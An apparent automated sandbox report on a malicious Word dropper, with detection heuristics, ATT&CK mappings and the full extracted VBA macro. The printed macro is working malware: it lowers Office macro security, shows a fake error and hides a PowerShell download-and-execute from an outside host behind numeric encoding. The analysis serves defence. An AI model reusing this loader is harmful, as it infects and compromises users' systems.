MALICIOUS
364
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1204.002 Malicious File
The sample contains a heavily obfuscated VBA macro loader, specifically a Document_Open macro, which is designed to execute automatically when the document is opened. The VBA code uses CreateObject and CallByName to interact with the system, likely to download and execute a second-stage payload. The embedded VBA script reconstructs the string 'HKCU\Software\Microsoft\Office\16.0\Word\Security\VBAWarnings' and uses it in conjunction with Application.Version, indicating an attempt to manipulate Office security settings to enable macro execution.
Heuristics 11
-
ClamAV: Doc.Dropper.Agent-6879075-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6879075-0
-
VBA macros detected medium 6 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADERAuto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
CallByName call high OLE_VBA_CALLBYNAMECallByName call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Macro/content-enable lure medium SE_ENABLE_LUREDocument instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 3077 bytes |
SHA-256: ffc5e68a1a3b8c9aa1adfb3b74a90f571bd972b9184e4a77447e45fde13d709b |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 3 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
fxl
lod
ms
End Sub
Function ms()
MsgBox dec("103123120051119130118136128120129135051137120133134124130129051124134051129130135051118130128131116135124117127120051138124135123051135123124134051138130133119051130121121124118120051137120133134124130129"), vbCritical, dec("087130118136128120129135051088133133130133")
End Function
Function fxl()
Dim Pt, Ke As String
Pt = dec("102130121135138116133120111096124118133130134130121135111098121121124118120111") & Application.Version & dec("111088139118120127111102120118136133124135140")
Ke = dec("084118118120134134105085098096")
Set oReg = obj(dec("138124129128122128135134077142124128131120133134130129116135124130129095120137120127080124128131120133134130129116135120144052111111065111133130130135111119120121116136127135077102135119101120122099133130137"))
CallByName oReg, dec("102120135087106098101087105116127136120"), VbMethod, &H80000001, Pt, Ke, 1
End Function
Function obj(in1 As String) As Object
Set obj = GetObject(in1)
End Function
Function dec(in1 As String) As String
Dim out As String
out = ""
Do
out = out + ndec(odec(in1))
in1 = adec(in1)
Loop While Len(in1) > 0
dec = out
End Function
Function ndec(in1)
ndec = Chr(in1 - 19)
End Function
Function odec(in1)
odec = Left(in1, 3)
End Function
Function adec(in1)
adec = Right(in1, Len(in1) - 3)
End Function
Function lod()
Dim xl, xw As Object
Set xl = CreateObject(dec("088139118120127065084131131127124118116135124130129"))
CallByName xl, dec("105124134124117127120"), VbLet, False
CallByName xl, dec("087124134131127116140084127120133135134"), VbLet, False
Set xv = CallByName(xl, dec("106130133126117130130126134"), VbGet)
Set xw = CallByName(xv, dec("084119119"), VbGet)
Set xx = CallByName(xl, dec("084118135124137120106130133126117130130126"), VbGet)
nn = CallByName(xx, dec("097116128120"), VbGet)
xw.VBProject.VBComponents(1).CodeModule.AddFromString (dec("102136117051120059060") & vbCrLf & dec("086133120116135120098117125120118135") & "(""" & dec("106134118133124131135065102123120127127") & """)." & dec("101136129") & " """ & dec("131130138120133134123120127127051064120139120118051117140131116134134051064118051053053092088107059059097120138064098117125120118135051097120135065106120117086127124120129135060065087130138129127130116119102135133124129122059058123135135131077066066131116141116141135116065118130128066116131131066124118130129065131129122058060060053053") & """, 0" & vbCrLf & dec("088129119051102136117"))
CallByName xl, dec("101136129"), VbMethod, nn & dec("052103123124134106130133126117130130126065120")
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.